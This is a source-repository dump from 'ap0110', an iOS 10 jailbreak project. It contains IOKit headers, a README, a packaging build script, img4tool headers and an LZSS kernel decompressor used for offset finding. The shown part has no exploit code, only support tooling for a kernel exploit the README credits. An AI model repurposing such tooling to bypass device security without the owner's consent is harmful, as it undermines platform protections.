kIOReturnBadMedia iokit_common_err(0x2d1) // Media Error 98 | #define kIOReturnStillOpen iokit_common_err(0x2d2) // device(s) still open 99 | #define kIOReturnRLDError iokit_common_err(0x2d3) // rld failure 100 | #define kIOReturnDMAError iokit_common_err(0x2d4) // DMA failure 101 | #define kIOReturnBusy iokit_common_err(0x2d5) // Device Busy 102 | #define kIOReturnTimeout iokit_common_err(0x2d6) // I/O Timeout 103 | #define kIOReturnOffline iokit_common_err(0x2d7) // device offline 104 | #define kIOReturnNotReady iokit_common_err(0x2d8) // not ready 105 | #define kIOReturnNotAttached iokit_common_err(0x2d9) // device not attached 106 | #define kIOReturnNoChannels iokit_common_err(0x2da) // no DMA channels left 107 | #define kIOReturnNoSpace iokit_common_err(0x2db) // no space for data 108 | //#define kIOReturn???Error iokit_common_err(0x2dc) // ??? 109 | #define kIOReturnPortExists iokit_common_err(0x2dd) // port already exists 110 | #define kIOReturnCannotWire iokit_common_err(0x2de) // can't wire down 111 | // physical memory 112 | #define kIOReturnNoInterrupt iokit_common_err(0x2df) // no interrupt attached 113 | #define kIOReturnNoFrames iokit_common_err(0x2e0) // no DMA frames enqueued 114 | #define kIOReturnMessageTooLarge iokit_common_err(0x2e1) // oversized msg received 115 | // on interrupt port 116 | #define kIOReturnNotPermitted iokit_common_err(0x2e2) // not permitted 117 | #define kIOReturnNoPower iokit_common_err(0x2e3) // no power to device 118 | #define kIOReturnNoMedia iokit_common_err(0x2e4) // media not present 119 | #define kIOReturnUnformattedMedia iokit_common_err(0x2e5)// media not formatted 120 | #define kIOReturnUnsupportedMode iokit_common_err(0x2e6) // no such mode 121 | #define kIOReturnUnderrun iokit_common_err(0x2e7) // data underrun 122 | #define kIOReturnOverrun iokit_common_err(0x2e8) // data overrun 123 | #define kIOReturnDeviceError iokit_common_err(0x2e9) // the device is not working properly! 124 | #define kIOReturnNoCompletion iokit_common_err(0x2ea) // a completion routine is required 125 | #define kIOReturnAborted iokit_common_err(0x2eb) // operation aborted 126 | #define kIOReturnNoBandwidth iokit_common_err(0x2ec) // bus bandwidth would be exceeded 127 | #define kIOReturnNotResponding iokit_common_err(0x2ed) // device not responding 128 | #define kIOReturnIsoTooOld iokit_common_err(0x2ee) // isochronous I/O request for distant past! 129 | #define kIOReturnIsoTooNew iokit_common_err(0x2ef) // isochronous I/O request for distant future 130 | #define kIOReturnNotFound iokit_common_err(0x2f0) // data was not found 131 | #define kIOReturnInvalid iokit_common_err(0x1) // should never be seen 132 | 133 | #ifdef __cplusplus 134 | } 135 | #endif 136 | 137 | #endif /* ! __IOKIT_IORETURN_H */ 138 | -------------------------------------------------------------------------------- /IOKit.framework/Headers/IOTypes.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 1998-2006 Apple Computer, Inc. All rights reserved. 3 | * 4 | * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ 5 | * 6 | * This file contains Original Code and/or Modifications of Original Code 7 | * as defined in and that are subject to the Apple Public Source License 8 | * Version 2.0 (the 'License'). You may not use this file except in 9 | * compliance with the License. The rights granted to you under the License 10 | * may not be used to create, or enable the creation or redistribution of, 11 | * unlawful or unlicensed copies of an Apple operating system, or to 12 | * circumvent, violate, or enable the circumvention or violation of, any 13 | * terms of an Apple operating system software license agreement. 14 | * 15 | * Please obtain a copy of the License at 16 | * http://www.opensource.apple.com/apsl/ and read it before using this file. 17 | * 18 | * The Original Code and all software distributed under the License are 19 | * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER 20 | * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, 21 | * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, 22 | * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. 23 | * Please see the License for the specific language governing rights and 24 | * limitations under the License. 25 | * 26 | * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ 27 | */ 28 | #ifndef __IOKIT_IOTYPES_H 29 | #define __IOKIT_IOTYPES_H 30 | 31 | #ifndef IOKIT 32 | #define IOKIT 1 33 | #endif /* !IOKIT */ 34 | 35 | #if KERNEL 36 | #include 37 | #else 38 | #include 39 | #include 40 | #endif 41 | 42 | #include "IOReturn.h" 43 | 44 | #ifdef __cplusplus 45 | extern "C" { 46 | #endif 47 | 48 | #ifndef NULL 49 | #if defined (__cplusplus) 50 | #define NULL 0 51 | #else 52 | #define NULL ((void *)0) 53 | #endif 54 | #endif 55 | 56 | /* 57 | * Simple data types. 58 | */ 59 | #ifndef __MACTYPES__ /* CF MacTypes.h */ 60 | #ifndef __TYPES__ /* guess... Mac Types.h */ 61 | 62 | #include 63 | #include 64 | 65 | #endif /* __TYPES__ */ 66 | #endif /* __MACTYPES__ */ 67 | 68 | #if KERNEL 69 | #include 70 | #endif 71 | 72 | typedef UInt32 IOOptionBits; 73 | typedef SInt32 IOFixed; 74 | typedef UInt32 IOVersion; 75 | typedef UInt32 IOItemCount; 76 | typedef UInt32 IOCacheMode; 77 | 78 | typedef UInt32 IOByteCount32; 79 | typedef UInt64 IOByteCount64; 80 | 81 | typedef UInt32 IOPhysicalAddress32; 82 | typedef UInt64 IOPhysicalAddress64; 83 | typedef UInt32 IOPhysicalLength32; 84 | typedef UInt64 IOPhysicalLength64; 85 | 86 | #ifdef __LP64__ 87 | typedef mach_vm_address_t IOVirtualAddress; 88 | #else 89 | typedef vm_address_t IOVirtualAddress; 90 | #endif 91 | 92 | #if defined(__LP64__) && defined(KERNEL) 93 | typedef IOByteCount64 IOByteCount; 94 | #else 95 | typedef IOByteCount32 IOByteCount; 96 | #endif 97 | 98 | typedef IOVirtualAddress IOLogicalAddress; 99 | 100 | #if defined(__LP64__) && defined(KERNEL) 101 | 102 | typedef IOPhysicalAddress64 IOPhysicalAddress; 103 | typedef IOPhysicalLength64 IOPhysicalLength; 104 | #define IOPhysical32( hi, lo ) ((UInt64) lo + ((UInt64)(hi) << 32)) 105 | #define IOPhysSize 64 106 | 107 | #else 108 | 109 | typedef IOPhysicalAddress32 IOPhysicalAddress; 110 | typedef IOPhysicalLength32 IOPhysicalLength; 111 | #define IOPhysical32( hi, lo ) (lo) 112 | #define IOPhysSize 32 113 | 114 | #endif 115 | 116 | 117 | typedef struct 118 | { 119 | IOPhysicalAddress address; 120 | IOByteCount length; 121 | } IOPhysicalRange; 122 | 123 | typedef struct 124 | { 125 | IOVirtualAddress address; 126 | IOByteCount length; 127 | } IOVirtualRange; 128 | 129 | #ifdef __LP64__ 130 | typedef IOVirtualRange IOAddressRange; 131 | #else /* !__LP64__ */ 132 | typedef struct 133 | { 134 | mach_vm_address_t address; 135 | mach_vm_size_t length; 136 | } IOAddressRange; 137 | #endif /* !__LP64__ */ 138 | 139 | /* 140 | * Map between #defined or enum'd constants and text description. 141 | */ 142 | typedef struct { 143 | int value; 144 | const char *name; 145 | } IONamedValue; 146 | 147 | 148 | /* 149 | * Memory alignment -- specified as a power of two. 150 | */ 151 | typedef unsigned int IOAlignment; 152 | 153 | #define IO_NULL_VM_TASK ((vm_task_t)0) 154 | 155 | 156 | /* 157 | * Pull in machine specific stuff. 158 | */ 159 | 160 | //#include 161 | 162 | #ifndef MACH_KERNEL 163 | 164 | #ifndef __IOKIT_PORTS_DEFINED__ 165 | #define __IOKIT_PORTS_DEFINED__ 166 | #ifdef KERNEL 167 | typedef struct OSObject * io_object_t; 168 | #else /* KERNEL */ 169 | typedef mach_port_t io_object_t; 170 | #endif /* KERNEL */ 171 | #endif /* __IOKIT_PORTS_DEFINED__ */ 172 | 173 | #include 174 | 175 | typedef io_object_t io_connect_t; 176 | typedef io_object_t io_enumerator_t; 177 | typedef io_object_t io_iterator_t; 178 | typedef io_object_t io_registry_entry_t; 179 | typedef io_object_t io_service_t; 180 | 181 | #define IO_OBJECT_NULL ((io_object_t) 0) 182 | 183 | #endif /* MACH_KERNEL */ 184 | 185 | // IOConnectMapMemory memoryTypes 186 | enum { 187 | kIODefaultMemoryType = 0 188 | }; 189 | 190 | enum { 191 | kIODefaultCache = 0, 192 | kIOInhibitCache = 1, 193 | kIOWriteThruCache = 2, 194 | kIOCopybackCache = 3, 195 | kIOWriteCombineCache = 4 196 | }; 197 | 198 | // IOMemory mapping options 199 | enum { 200 | kIOMapAnywhere = 0x00000001, 201 | 202 | kIOMapCacheMask = 0x00000700, 203 | kIOMapCacheShift = 8, 204 | kIOMapDefaultCache = kIODefaultCache << kIOMapCacheShift, 205 | kIOMapInhibitCache = kIOInhibitCache << kIOMapCacheShift, 206 | kIOMapWriteThruCache = kIOWriteThruCache << kIOMapCacheShift, 207 | kIOMapCopybackCache = kIOCopybackCache << kIOMapCacheShift, 208 | kIOMapWriteCombineCache = kIOWriteCombineCache << kIOMapCacheShift, 209 | 210 | kIOMapUserOptionsMask = 0x00000fff, 211 | 212 | kIOMapReadOnly = 0x00001000, 213 | 214 | kIOMapStatic = 0x01000000, 215 | kIOMapReference = 0x02000000, 216 | kIOMapUnique = 0x04000000 217 | #ifdef XNU_KERNEL_PRIVATE 218 | , kIOMap64Bit = 0x08000000 219 | #endif 220 | }; 221 | 222 | /*! @enum Scale Factors 223 | @discussion Used when a scale_factor parameter is required to define a unit of time. 224 | @constant kNanosecondScale Scale factor for nanosecond based times. 225 | @constant kMicrosecondScale Scale factor for microsecond based times. 226 | @constant kMillisecondScale Scale factor for millisecond based times. 227 | @constant kTickScale Scale factor for the standard (100Hz) tick. 228 | @constant kSecondScale Scale factor for second based times. */ 229 | 230 | enum { 231 | kNanosecondScale = 1, 232 | kMicrosecondScale = 1000, 233 | kMillisecondScale = 1000 * 1000, 234 | kSecondScale = 1000 * 1000 * 1000, 235 | kTickScale = (kSecondScale / 100) 236 | }; 237 | 238 | /* compatibility types */ 239 | 240 | #ifndef KERNEL 241 | 242 | typedef unsigned int IODeviceNumber; 243 | 244 | #endif 245 | 246 | #ifdef __cplusplus 247 | } 248 | #endif 249 | 250 | #endif /* ! __IOKIT_IOTYPES_H */ 251 | -------------------------------------------------------------------------------- /IOKit.framework/Headers/OSMessageNotification.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 1998-2000 Apple Computer, Inc. All rights reserved. 3 | * 4 | * @APPLE_LICENSE_HEADER_START@ 5 | * 6 | * This file contains Original Code and/or Modifications of Original Code 7 | * as defined in and that are subject to the Apple Public Source License 8 | * Version 2.0 (the 'License'). You may not use this file except in 9 | * compliance with the License. Please obtain a copy of the License at 10 | * http://www.opensource.apple.com/apsl/ and read it before using this 11 | * file. 12 | * 13 | * The Original Code and all software distributed under the License are 14 | * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER 15 | * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, 16 | * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, 17 | * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. 18 | * Please see the License for the specific language governing rights and 19 | * limitations under the License. 20 | * 21 | * @APPLE_LICENSE_HEADER_END@ 22 | */ 23 | /* 24 | * Copyright (c) 1999 Apple Computer, Inc. All rights reserved. 25 | * 26 | * HISTORY 27 | * 28 | */ 29 | 30 | #ifndef __OS_OSMESSAGENOTIFICATION_H 31 | #define __OS_OSMESSAGENOTIFICATION_H 32 | 33 | #ifdef __cplusplus 34 | extern "C" { 35 | #endif 36 | 37 | #include 38 | #include "IOReturn.h" 39 | 40 | enum { 41 | kFirstIOKitNotificationType = 100, 42 | kIOServicePublishNotificationType = 100, 43 | kIOServiceMatchedNotificationType = 101, 44 | kIOServiceTerminatedNotificationType = 102, 45 | kIOAsyncCompletionNotificationType = 150, 46 | kIOServiceMessageNotificationType = 160, 47 | kLastIOKitNotificationType = 199 48 | }; 49 | 50 | enum { 51 | kOSNotificationMessageID = 53, 52 | kOSAsyncCompleteMessageID = 57, 53 | kMaxAsyncArgs = 16 54 | }; 55 | 56 | enum { 57 | kIOAsyncReservedIndex = 0, 58 | kIOAsyncReservedCount, 59 | 60 | kIOAsyncCalloutFuncIndex = kIOAsyncReservedCount, 61 | kIOAsyncCalloutRefconIndex, 62 | kIOAsyncCalloutCount, 63 | 64 | kIOMatchingCalloutFuncIndex = kIOAsyncReservedCount, 65 | kIOMatchingCalloutRefconIndex, 66 | kIOMatchingCalloutCount, 67 | 68 | kIOInterestCalloutFuncIndex = kIOAsyncReservedCount, 69 | kIOInterestCalloutRefconIndex, 70 | kIOInterestCalloutServiceIndex, 71 | kIOInterestCalloutCount 72 | }; 73 | 74 | enum { 75 | kOSAsyncRefCount = 8, 76 | kOSAsyncRefSize = 32 77 | }; 78 | typedef natural_t OSAsyncReference[kOSAsyncRefCount]; 79 | 80 | struct OSNotificationHeader { 81 | vm_size_t size; /* content size */ 82 | natural_t type; 83 | OSAsyncReference reference; 84 | 85 | #if defined(__STDC_VERSION__) && (__STDC_VERSION__ >= 199901L) 86 | unsigned char content[]; 87 | #else 88 | unsigned char content[0]; 89 | #endif 90 | }; 91 | 92 | struct IOServiceInterestContent { 93 | natural_t messageType; 94 | void * messageArgument[1]; 95 | }; 96 | 97 | struct IOAsyncCompletionContent { 98 | IOReturn result; 99 | #if defined(__STDC_VERSION__) && (__STDC_VERSION__ >= 199901L) 100 | void * args[]; 101 | #else 102 | void * args[0]; 103 | #endif 104 | }; 105 | 106 | #ifndef __cplusplus 107 | typedef struct OSNotificationHeader OSNotificationHeader; 108 | typedef struct IOServiceInterestContent IOServiceInterestContent; 109 | typedef struct IOAsyncCompletionContent IOAsyncCompletionContent; 110 | #endif 111 | 112 | #ifdef __cplusplus 113 | } 114 | #endif 115 | 116 | #endif /* __OS_OSMESSAGENOTIFICATION_H */ 117 | 118 | -------------------------------------------------------------------------------- /IOKit.framework/IOKit.tbd: -------------------------------------------------------------------------------- 1 | Versions/A/IOKit.tbd -------------------------------------------------------------------------------- /IOKit.framework/Versions/Current: -------------------------------------------------------------------------------- 1 | A -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # ap0110 2 | ap0110 is an autoexecuting jailbreak for iOS 10.x, on 32 and 64-bit. 3 | 4 | Developed by the Athenus Dev Team and w212. <3 5 | 6 | ## Credits 7 | ``` 8 | tihmstar - h3lix, liboffsetfinder32, liboffsetfinder64 9 | SongXiaoXi - sockH3lix, 32-bit version of sock_port 10 | spacepilotAV - voip_load/Athenus autoexecution, most of the porting of sockH3lix to function with Athenus & testing 11 | mario_bros_tech - not any testing because he's a fuckhead ;) 12 | ``` 13 | 14 | ## Confirmed Supported Devices 15 | |Device|Version| 16 | |-|-| 17 | |iPhone 5|iOS 10.3.3| 18 | |iPhone 5|iOS 10.3.4| 19 | |iPhone 5S|iOS 10.3.3| 20 | -------------------------------------------------------------------------------- /build.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | rm Payload.ipa 4 | xcodebuild build CODE_SIGN_IDENTITY="" CODE_SIGNING_REQUIRED=NO -sdk iphoneos 5 | mkdir Payload 6 | mv build/Release-iphoneos/ap0110.app Payload/ 7 | cp Athenus/Ap0110-1024.png Payload/ap0110.app/ 8 | zip -r ap0110.ipa Payload 9 | rm -rf Payload 10 | rm -rf build 11 | xcodebuild clean 12 | -------------------------------------------------------------------------------- /img4tool/all_img4tool.h: -------------------------------------------------------------------------------- 1 | // 2 | // all.h 3 | // img4tool 4 | // 5 | // Created by tihmstar on 15.06.16. 6 | // Copyright © 2016 tihmstar. All rights reserved. 7 | // 8 | 9 | #ifndef all_h 10 | #define all_h 11 | 12 | #define error(a ...) printf("[Error] %s: ",__func__),printf(a) 13 | #define warning(a ...) printf("[Warning] %s: ",__func__),printf(a) 14 | 15 | #ifdef DEBUG //this is for developing with Xcode 16 | #define IMG4TOOL_VERSION_COMMIT_COUNT "Debug" 17 | #define IMG4TOOL_VERSION_COMMIT_SHA "Build: " __DATE__ " " __TIME__ 18 | #define HAVE_LIBCOMPRESSION 19 | #else 20 | #include 21 | #endif 22 | 23 | #endif /* all_h */ 24 | -------------------------------------------------------------------------------- /img4tool/img4.h: -------------------------------------------------------------------------------- 1 | // 2 | // img4.h 3 | // img4tool 4 | // 5 | // Created by tihmstar on 15.06.16. 6 | // Copyright © 2016 tihmstar. All rights reserved. 7 | // 8 | 9 | #ifndef img4_h 10 | #define img4_h 11 | 12 | #ifdef __cplusplus 13 | extern "C" { 14 | #endif 15 | 16 | #include 17 | #include 18 | #define LEN_XTND 0x80 /* Indefinite or long form */ 19 | typedef unsigned char byte; 20 | 21 | #define putStr(s,l) printf("%.*s",(int)l,s) 22 | 23 | //TagClass 24 | #define kASN1TagClassUniversal 0 25 | #define kASN1TagClassApplication 1 26 | #define kASN1TagClassContextSpecific 2 27 | #define kASN1TagClassPrivate 3 28 | 29 | //primitive 30 | #define kASN1Primitive 0 31 | #define kASN1Contructed 1 32 | 33 | //tagNumber 34 | #define kASN1TagEnd_of_Content 0 35 | #define kASN1TagBOOLEAN 1 36 | #define kASN1TagINTEGER 2 37 | #define kASN1TagBIT 3 38 | #define kASN1TagOCTET 4 39 | #define kASN1TagNULL 5 40 | #define kASN1TagOBJECT 6 41 | #define kASN1TagObject 7 42 | #define kASN1TagEXTERNAL 8 43 | #define kASN1TagREAL 9 44 | #define kASN1TagENUMERATED 10 //0x0A 45 | #define kASN1TagEMBEDDED 11 //0x0B 46 | #define kASN1TagUTF8String 12 //0x0C 47 | #define kASN1TagRELATIVE_OID 13 //0x0D 48 | #define kASN1TagReserved (14 | 15) //(0x0E | 0x0F) 49 | #define kASN1TagSEQUENCE 16 //0x10 50 | #define kASN1TagSET 17 //0x11 51 | #define kASN1TagNumericString 18 //0x12 52 | #define kASN1TagPrintableString 19 //0x13 53 | #define kASN1TagT61String 20 //0x14 54 | #define kASN1TagVideotexString 21 //0x15 55 | #define kASN1TagIA5String 22 //0x16 56 | #define kASN1TagUTCTime 23 //0x17 57 | #define kASN1TagGeneralizedTime 24 //0x18 58 | #define kASN1TagGraphicString 25 //0x19 59 | #define kASN1TagVisibleString 26 //0x1A 60 | #define kASN1TagGeneralString 27 //0x1B 61 | #define kASN1TagUniversalString 28 //0x1C 62 | #define kASN1TagCHARACTER 29 //0x1D 63 | #define kASN1TagBMPString 30 //0x1E 64 | #define kASN1TagPrivate (char)0xff 65 | 66 | typedef struct{ 67 | byte tagNumber : 5; 68 | byte isConstructed : 1; 69 | byte tagClass : 2; 70 | }t_asn1Tag; 71 | 72 | typedef struct{ 73 | byte len : 7; 74 | byte isLong : 1; 75 | }t_asn1Length; 76 | 77 | typedef struct{ 78 | size_t dataLen; 79 | size_t sizeBytes; 80 | } t_asn1ElemLen; 81 | 82 | typedef struct{ 83 | byte num : 7; 84 | byte more : 1; 85 | }t_asn1PrivateTag; 86 | 87 | 88 | #ifndef __cplusplus 89 | typedef enum{ 90 | false, 91 | true 92 | }bool; 93 | #endif 94 | 95 | //asn1 96 | t_asn1ElemLen asn1Len(const char buf[4]); 97 | char *ans1GetString(char *buf, char **outString, size_t *strlen); 98 | int asn1ElementsInObject(const char *buf); 99 | char *asn1ElementAtIndex(const char *buf, int index); 100 | 101 | 102 | char *getValueForTagInSet(char *set, uint32_t tag); 103 | 104 | 105 | //img4 106 | void printIM4P(char *buf); 107 | void printIM4R(char *buf); 108 | void printIM4M(char *buf, bool printAll); 109 | void printMANB(char *buf, bool printAll); 110 | 111 | int sequenceHasName(const char *buf, char *name); 112 | int getSequenceName(const char *buf,char**name, size_t *nameLen); 113 | size_t asn1GetPrivateTagnum(t_asn1Tag *tag, size_t *sizebytes); 114 | int extractFileFromIM4P(char *buf, const char *dstFilename); 115 | void printElemsInIMG4(char *buf, bool printAll, bool im4pOnly); 116 | 117 | char *getElementFromIMG4(char *buf, char* element); 118 | int extractElementFromIMG4(char *buf, char* element, const char *dstFilename); 119 | char *makeIMG4(char *im4p, char *im4m, char *im4r, size_t *size); 120 | 121 | char *getBNCHFromIM4M(const char* im4m, size_t *nonceSize); 122 | char *getIM4PFromIMG4(char *buf); 123 | char *getIM4MFromIMG4(char *buf); 124 | 125 | int replaceNameInIM4P(char *buf, const char *newName); 126 | int verifyIM4MSignature(const char *buf); 127 | int verifyIMG4(char *buf, plist_t buildmanifest); 128 | 129 | plist_t getBuildIdentityForIM4M(const char *buf, const plist_t buildmanifest); 130 | void printGeneralBuildIdentityInformation(plist_t buildidentity); 131 | 132 | char* extractPayloadFromIM4P(const char* buf, const char** compname, size_t *len); 133 | 134 | #ifdef __cplusplus 135 | } 136 | #endif 137 | 138 | #endif /* img4_h */ 139 | -------------------------------------------------------------------------------- /img4tool/img4tool.h: -------------------------------------------------------------------------------- 1 | // 2 | // img4tool.h 3 | // futurerestore 4 | // 5 | // Created by tihmstar on 03.09.16. 6 | // Copyright © 2016 tihmstar. All rights reserved. 7 | // 8 | 9 | #ifndef img4tool_h 10 | #define img4tool_h 11 | 12 | #ifdef __cplusplus 13 | extern "C" { 14 | #endif 15 | 16 | #include 17 | 18 | char *im4mFormShshFile(const char *shshfile, char **generator); 19 | char *readFromFile(const char *filePath); 20 | char *parseNonce(const char *nonce,size_t noncelen); 21 | 22 | 23 | #ifdef __cplusplus 24 | } 25 | #endif 26 | 27 | #endif /* img4tool_h */ 28 | -------------------------------------------------------------------------------- /img4tool/lzssdec.h: -------------------------------------------------------------------------------- 1 | // 2 | // lzssdec.h 3 | // img4tool 4 | // 5 | // Code borrowed from: http://newosxbook.com/src.jl?tree=listings&file=joker.c 6 | // Coded by Jonathan Levin (a.k.a @Morpheus______), http://newosxbook.com 7 | 8 | #ifndef lzssdec_h 9 | #define lzssdec_h 10 | 11 | #include 12 | #include 13 | 14 | char *tryLZSS(char *compressed, size_t *filesize); 15 | 16 | #endif /* lzssdec_h */ 17 | -------------------------------------------------------------------------------- /liboffsetfinder32/img3dec.hpp: -------------------------------------------------------------------------------- 1 | // 2 | // img3dec.hpp 3 | // sockH3lix 4 | // 5 | // Created by SXX on 2020/12/19. 6 | // Copyright © 2020 tihmstar. All rights reserved. 7 | // 8 | 9 | #ifndef img3dec_hpp 10 | #define img3dec_hpp 11 | 12 | #include 13 | 14 | typedef struct img3 img3; 15 | typedef struct tag tag; 16 | 17 | class img3decompress { 18 | FILE *file; 19 | off_t filesize; 20 | const char *key; 21 | const char *iv; 22 | uint8_t *mmapped; 23 | img3 *img3Header; 24 | int fd; 25 | char ident[5]; 26 | char type[5]; 27 | tag *tag; 28 | size_t lzss_size; 29 | size_t lzss_src_size; 30 | bool has_kbag; 31 | uint32_t ibuf_off = 0; 32 | lzssdecompress lzss; 33 | uint8_t *data; 34 | public: 35 | img3decompress(FILE *inputfh, const char *key = nullptr, const char *iv = nullptr); 36 | ~img3decompress(); 37 | inline size_t out_size() const noexcept { 38 | return lzss_size; 39 | } 40 | 41 | // Return false to indicate that the decompression encountered EoF 42 | bool decompress(uint8_t *out_buf, size_t &out_size); 43 | }; 44 | 45 | int decompress_kernel_32(FILE *inputfh, void *&memory, size_t &size); 46 | 47 | #endif /* img3dec_hpp */ 48 | -------------------------------------------------------------------------------- /liboffsetfinder32/lzssdec.cpp: -------------------------------------------------------------------------------- 1 | // 2 | // lzssdec.cpp 3 | // sockH3lix 4 | // 5 | // Created by SXX on 2020/12/19. 6 | // Copyright © 2020 tihmstar. All rights reserved. 7 | 8 | #if !__arm64__ 9 | // (C)2009 Willem Hengeveld itsme@xs4all.nl 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include "lzssdec.hpp" 18 | 19 | // streaming version of the lzss algorithm, as defined in BootX-75/bootx.tproj/sl.subproj/lzss.c 20 | // you can use lzssdec in a filter, like: 21 | // 22 | // cat file.lzss | lzssdec > file.decompressed 23 | // 24 | extern "C" int g_debug= 0; 25 | 26 | lzssdecompress::lzssdecompress() { 27 | _maxmatch= 18; // 4 bit size + threshold 28 | _dictsize= 4096; // 12 bit size 29 | _copythreshold= 3; // 0 == copy 3 bytes 30 | _dict= new uint8_t[_dictsize+_maxmatch-1]; 31 | 32 | reset(); 33 | } 34 | lzssdecompress::~lzssdecompress() { 35 | delete[] _dict; 36 | _dict= 0; _dictsize= 0; 37 | } 38 | void lzssdecompress::reset() { 39 | _state=EXPECTINGFLAG; 40 | _flags= 0; _bitnr= 0; 41 | _src=_srcend=_dst=_dstend=0; 42 | memset(_dict, ' ', _dictsize+_maxmatch-1); 43 | _dictptr= _dictsize-_maxmatch; 44 | _inputoffset= 0; 45 | _outputoffset= 0; 46 | _firstbyte= 0; 47 | _copyptr= 0; 48 | _copycount= 0; 49 | } 50 | void lzssdecompress::decompress(uint8_t *dst, uint32_t dstlen, uint32_t *pdstused, uint8_t *src, uint32_t srclen, uint32_t *psrcused) { 51 | _src= src; _srcend= src+srclen; 52 | _dst= dst; _dstend= dst+dstlen; 53 | 54 | while (_src<_srcend && _dst<_dstend) { 55 | switch(_state) { 56 | case EXPECTINGFLAG: 57 | if (g_debug) fprintf(stderr, "%08x,%08x: flag: %02x\n", _inputoffset, _outputoffset, *_src); 58 | _flags= *_src++; 59 | _inputoffset++; 60 | _bitnr= 0; 61 | _state= PROCESSFLAGBIT; 62 | break; 63 | case PROCESSFLAGBIT: 64 | if (_flags&1) { 65 | if (g_debug) fprintf(stderr, "%08x,%08x: bit%d: %03x copybyte %02x\n", _inputoffset, _outputoffset, _bitnr, _dictptr, *_src); 66 | addtodict(*_dst++ = *_src++); 67 | _inputoffset++; 68 | _outputoffset++; 69 | nextflagbit(); 70 | } 71 | else { 72 | _firstbyte= *_src++; 73 | _inputoffset++; 74 | _state= EXPECTING2NDBYTE; 75 | } 76 | break; 77 | case EXPECTING2NDBYTE: 78 | { 79 | uint8_t secondbyte= *_src++; 80 | _inputoffset++; 81 | setcounter(_firstbyte, secondbyte); 82 | if (g_debug) fprintf(stderr, "%08x,%08x: bit%d: %03x %02x %02x : copy %d bytes from %03x", _inputoffset-2, _outputoffset, _bitnr, _dictptr, _firstbyte, secondbyte, _copycount, _copyptr); 83 | if (g_debug) dumpcopydata(); 84 | _state= COPYFROMDICT; 85 | } 86 | break; 87 | case COPYFROMDICT: 88 | copyfromdict(); 89 | break; 90 | } 91 | } 92 | if (g_debug) fprintf(stderr, "decompress state= %d, copy: 0x%x, 0x%x\n", _state, _copyptr, _copycount); 93 | if (pdstused) *pdstused= (uint32_t)(_dst-dst); 94 | if (psrcused) *psrcused= (uint32_t)(_src-src); 95 | } 96 | void lzssdecompress::flush(uint8_t *dst, uint32_t dstlen, uint32_t *pdstused) { 97 | if (g_debug) fprintf(stderr, "flash before state= %d, copy: 0x%x, 0x%x\n", _state, _copyptr, _copycount); 98 | _src= _srcend= NULL; 99 | _dst= dst; _dstend= dst+dstlen; 100 | 101 | if (_state==COPYFROMDICT) 102 | copyfromdict(); 103 | 104 | if (pdstused) *pdstused= (uint32_t)(_dst-dst); 105 | if (g_debug) fprintf(stderr, "flash after state= %d, copy: 0x%x, 0x%x\n", _state, _copyptr, _copycount); 106 | } 107 | void lzssdecompress::copyfromdict() { 108 | while (_dst<_dstend && _copycount) { 109 | addtodict(*_dst++ = _dict[_copyptr++]); 110 | _outputoffset++; 111 | _copycount--; 112 | _copyptr= _copyptr&(_dictsize-1); 113 | } 114 | if (_copycount==0) 115 | nextflagbit(); 116 | } 117 | void lzssdecompress::dumpcopydata() { 118 | // note: we are printing incorrect data, if _copyptr == _dictptr-1 119 | for (int i=0 ; i<_copycount ; i++) 120 | fprintf(stderr, " %02x", _dict[(_copyptr+i)&(_dictsize-1)]); 121 | fprintf(stderr, "\n"); 122 | } 123 | void lzssdecompress::addtodict(uint8_t c) { 124 | _dict[_dictptr++]= c; 125 | _dictptr = _dictptr&(_dictsize-1); 126 | } 127 | void lzssdecompress::nextflagbit() { 128 | _bitnr++; 129 | _flags>>=1; 130 | _state = _bitnr==8 ? EXPECTINGFLAG : PROCESSFLAGBIT; 131 | } 132 | void lzssdecompress::setcounter(uint8_t first, uint8_t second) { 133 | _copyptr= first | ((second&0xf0)<<4); 134 | _copycount= _copythreshold + (second&0xf); 135 | } 136 | 137 | #ifdef HAVE_MAIN 138 | void usage() { 139 | fprintf(stderr, "Usage: lzssdec [-d] [-o OFFSET]\n"); 140 | } 141 | int main(int argc,char**argv) { 142 | #define HANDLEULOPTION(var, type) (argv[i][2] ? var= (type)strtoul(argv[i]+2, 0, 0) : i+1 bytes 167 | while (skipbytes && !feof(stdin)) { 168 | int nr= fread(ibuf, 1, std::min(skipbytes,(uint32_t)CHUNK), stdin); 169 | skipbytes -= nr; 170 | } 171 | 172 | while (!feof(stdin)) { 173 | size_t nr= fread(ibuf, 1, CHUNK, stdin); 174 | if (nr==0) { 175 | perror("read"); 176 | return 1; 177 | } 178 | if (nr==0) 179 | break; 180 | 181 | size_t srcp= 0; 182 | while (srcp 0x%x\n", srcused, dstused); 193 | } 194 | } 195 | if (g_debug) fprintf(stderr, "done reading\n"); 196 | uint32_t dstused; 197 | lzss.flush(obuf, CHUNK, &dstused); 198 | size_t nw= fwrite(obuf, 1, dstused, stdout); 199 | if (nw 13 | 14 | #ifdef __cplusplus 15 | 16 | extern "C" int g_debug; 17 | class __attribute__((visibility("hidden"))) lzssdecompress { 18 | enum { COPYFROMDICT, EXPECTINGFLAG, PROCESSFLAGBIT, EXPECTING2NDBYTE }; 19 | int _state; 20 | uint8_t _flags; 21 | int _bitnr; 22 | uint8_t *_src, *_srcend; 23 | uint8_t *_dst, *_dstend; 24 | uint8_t _firstbyte; 25 | 26 | uint8_t *_dict; 27 | 28 | int _dictsize; 29 | int _maxmatch; 30 | int _copythreshold; 31 